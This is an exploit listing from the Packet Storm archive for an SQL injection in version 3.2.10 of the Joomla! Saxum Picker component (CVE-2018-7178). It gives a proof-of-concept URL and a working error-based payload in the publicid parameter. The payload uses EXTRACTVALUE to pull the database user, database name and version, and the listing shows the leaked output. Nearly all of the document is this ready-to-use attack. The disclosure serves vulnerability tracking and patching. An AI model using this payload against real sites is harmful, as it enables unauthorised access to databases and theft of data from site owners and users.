Joomla! Saxum Picker 3.2.10 SQL Injection

2018-02-17T00:00:00
ID PACKETSTORM:146466
Type packetstorm
Reporter Ihsan Sencan
Modified 2018-02-17T00:00:00

Description

                                        
                                            `# # # # #   
# Exploit Title: Joomla! Component Saxum Picker 3.2.10 - SQL Injection  
# Dork: N/A  
# Date: 16.02.2018  
# Vendor Homepage: http://www.saxum2003.hu/  
# Software Link: https://extensions.joomla.org/extensions/extension/sports-a-games/games/saxumpicker/  
# Software Download: http://www.saxum2003.hu/downloadsen/file/97-picker32.html  
# Version: 3.2.10  
# Category: Webapps  
# Tested on: WiN7_x64/KaLiLinuX_x64  
# CVE: CVE-2018-7178  
# # # # #   
# Exploit Author: Ihsan Sencan  
# # # # #  
#   
# POC:   
#   
# 1)  
# http://localhost/[PATH]/index.php?option=com_saxumpicker&view=savedspread&publicid=[SQL]  
#   
# # # # #  
  
  
  
  
  
http://localhost/Joomla375/index.php?option=com_saxumpicker&view=savedspread&publicid=1' AND EXTRACTVALUE(66,CONCAT(0x5c,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),(SELECT (ELT(66=66,1)))))-- -  
1105 XPATH syntax error: '\root@localhost : joomla375 : 10'  
  
`